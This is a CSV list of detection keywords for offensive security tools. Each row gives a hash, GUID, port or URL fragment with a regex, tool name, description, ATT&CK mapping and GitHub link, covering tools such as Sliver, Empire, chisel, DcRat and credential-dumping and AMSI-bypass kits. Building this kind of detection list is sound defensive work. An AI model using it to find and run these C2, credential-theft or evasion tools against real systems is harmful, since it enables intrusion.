"*11055d6a12b8735ded0fe5289323c15cd237caa413c0aca76951b3b3a4178806*",".{0,1000}11055d6a12b8735ded0fe5289323c15cd237caa413c0aca76951b3b3a4178806.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*111c72f8a97ce4e1bdfcf1815c4ec433618e7a6c1c73c567f1059d2175357c42*",".{0,1000}111c72f8a97ce4e1bdfcf1815c4ec433618e7a6c1c73c567f1059d2175357c42.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*11385CC1-54B7-4968-9052-DF8BB1961F1E*",".{0,1000}11385CC1\-54B7\-4968\-9052\-DF8BB1961F1E.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*1145de7228a8791659911e809cf8841fea94a38ade1488a647310857201344a5*",".{0,1000}1145de7228a8791659911e809cf8841fea94a38ade1488a647310857201344a5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*115309fcd130393cc85154585caf9ef08f101133c5fa27307469f02f3e8c1461*",".{0,1000}115309fcd130393cc85154585caf9ef08f101133c5fa27307469f02f3e8c1461.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*115582571181b99e7b64918a94fe75c24eba2a95da256fff85799d19e6a47b17*",".{0,1000}115582571181b99e7b64918a94fe75c24eba2a95da256fff85799d19e6a47b17.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*11754456d43dc010e48cc2b5294d3a7d84f3a28bd27fd8183a3162ede955e30b*",".{0,1000}11754456d43dc010e48cc2b5294d3a7d84f3a28bd27fd8183a3162ede955e30b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*119.45.104.153:8848*",".{0,1000}119\.45\.104\.153\:8848.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*11c8f70aac612dfbe48ee5c4be2984d0c32a3a15b4a33f3b352adc7cbdb8c937*",".{0,1000}11c8f70aac612dfbe48ee5c4be2984d0c32a3a15b4a33f3b352adc7cbdb8c937.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*11cc4ad77bf6c0db1f6b3f8b85ae6ee230c3ca7e1425b63b7c1fe1b51c53b048*",".{0,1000}11cc4ad77bf6c0db1f6b3f8b85ae6ee230c3ca7e1425b63b7c1fe1b51c53b048.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*11db72b2a60d5be74d95f4a311571f045086efef145562edf02046d97f44f975*",".{0,1000}11db72b2a60d5be74d95f4a311571f045086efef145562edf02046d97f44f975.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*11f51e1a8f1a630390533599cfbcb78133d680f6*",".{0,1000}11f51e1a8f1a630390533599cfbcb78133d680f6.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*11fcbd067d55ddaa11e622be03a55ea342efe497cbcb14abf4dc410cb5d7a203*",".{0,1000}11fcbd067d55ddaa11e622be03a55ea342efe497cbcb14abf4dc410cb5d7a203.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*12139d47846b3be4267cb079cd73db336c938f111880e23a2f21d19b75921c7b*",".{0,1000}12139d47846b3be4267cb079cd73db336c938f111880e23a2f21d19b75921c7b.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*123abcbde966780cef8d9ec24523acac*",".{0,1000}123abcbde966780cef8d9ec24523acac.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","0","N/A","N/A","4","357","39","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z" "*124e6ada27ffbe0ff97f51eb9d7caaf86b531bcff90ed5a075ff89b45b00cba5*",".{0,1000}124e6ada27ffbe0ff97f51eb9d7caaf86b531bcff90ed5a075ff89b45b00cba5.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*1250BAE1-D26F-4EF2-9452-9B5009568336*",".{0,1000}1250BAE1\-D26F\-4EF2\-9452\-9B5009568336.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*125d5bee94f4a04a39b54ec1bcccb5256e0f34abc0ac991af803b1dc525cfbd7*",".{0,1000}125d5bee94f4a04a39b54ec1bcccb5256e0f34abc0ac991af803b1dc525cfbd7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning*",".{0,1000}127\.0\.0\.1\sis\snot\sadvisable\sas\sa\ssource\.\sUse\s\-l\s127\.0\.0\.1\sto\soverride\sthis\swarning.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*127.0.0.1/pipe/coerced\\C$*",".{0,1000}127\.0\.0\.1\/pipe\/coerced\\\\C\$.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","0","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*127.0.0.1:#{mitm_port}*",".{0,1000}127\.0\.0\.1\:\#\{mitm_port\}.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*127.0.0.1:1080*",".{0,1000}127\.0\.0\.1\:1080.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*127.0.0.1:1337*",".{0,1000}127\.0\.0\.1\:1337.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*127.0.0.1:2222*",".{0,1000}127\.0\.0\.1\:2222.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*127.0.0.1:31337*",".{0,1000}127\.0\.0\.1\:31337.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*127.0.0.1:4567*",".{0,1000}127\.0\.0\.1\:4567.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","50","4","2024-04-12T15:25:40Z","2023-04-19T10:59:30Z" "*127.0.0.1:53531*",".{0,1000}127\.0\.0\.1\:53531.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*127.0.0.1:5555*",".{0,1000}127\.0\.0\.1\:5555.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*127.0.0.1:7777*",".{0,1000}127\.0\.0\.1\:7777.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*127.0.0.1:8022*",".{0,1000}127\.0\.0\.1\:8022.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","73","12","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*127.0.0.1:8848*",".{0,1000}127\.0\.0\.1\:8848.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*127.0.0.1:9050*",".{0,1000}127\.0\.0\.1\:9050.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","73","12","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*127.0.0.1:9050*",".{0,1000}127\.0\.0\.1\:9050.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*128038cf630fced3b39cb074030f57e07cf1e975bc374ff7e281cce382284264*",".{0,1000}128038cf630fced3b39cb074030f57e07cf1e975bc374ff7e281cce382284264.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*12e0ec8e9b714f9f157496dace0e714238403b5e8f3000bbeedf31b0a811bf73*",".{0,1000}12e0ec8e9b714f9f157496dace0e714238403b5e8f3000bbeedf31b0a811bf73.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*12e9256bbb969343cc20fa9e259c0af1bf12d6c7bd0263bd7b2a60575b73cf62*",".{0,1000}12e9256bbb969343cc20fa9e259c0af1bf12d6c7bd0263bd7b2a60575b73cf62.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*13116f7c3441519cd91e74061f0490c15b1b99f32a5209ec52b9cc4ef3fb67de*",".{0,1000}13116f7c3441519cd91e74061f0490c15b1b99f32a5209ec52b9cc4ef3fb67de.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*13118127bd6a7dfaf76cb35833325627d1df6937064f6ec7d3a05f5829902d2b*",".{0,1000}13118127bd6a7dfaf76cb35833325627d1df6937064f6ec7d3a05f5829902d2b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1328197e04ea25df954765cb6b7cd7a2a13bae3ffdd71c4e60a8a627508efda6*",".{0,1000}1328197e04ea25df954765cb6b7cd7a2a13bae3ffdd71c4e60a8a627508efda6.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*132ab5d9aa388ae3a6575a01fadeb7fa7f77aac1150fc54bc1d20ae32b58ddc5*",".{0,1000}132ab5d9aa388ae3a6575a01fadeb7fa7f77aac1150fc54bc1d20ae32b58ddc5.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","image","5","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*1337*/api/agents/*/results?token=*",".{0,1000}1337.{0,1000}\/api\/agents\/.{0,1000}\/results\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*1337*/api/creds?token=*",".{0,1000}1337.{0,1000}\/api\/creds\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*1337*/api/listeners?token=*",".{0,1000}1337.{0,1000}\/api\/listeners\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*1337*infernal-twin*",".{0,1000}1337.{0,1000}infernal\-twin.{0,1000}","offensive_tool_keyword","infernal-twin","This tool is created to aid the penetration testers in assessing wireless security.","T1533 - T1553 - T1560 - T1569 - T1583","TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/entropy1337/infernal-twin","1","1","N/A","N/A","10","1215","258","2022-10-27T11:39:14Z","2015-02-07T21:04:57Z" "*1337OMGsam*",".{0,1000}1337OMGsam.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*1337OMGsys*",".{0,1000}1337OMGsys.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*13431429-2DB6-480F-B73F-CA019FE759E3*",".{0,1000}13431429\-2DB6\-480F\-B73F\-CA019FE759E3.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*135af50a105b966d85fc745bdac0b918c1afa0c1a7d4bbaf66acbc89eb59172a*",".{0,1000}135af50a105b966d85fc745bdac0b918c1afa0c1a7d4bbaf66acbc89eb59172a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1372ebd0f43824ac646712ab9b47a28938e2b58eb1dce8337c1d905dea0f7523*",".{0,1000}1372ebd0f43824ac646712ab9b47a28938e2b58eb1dce8337c1d905dea0f7523.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - 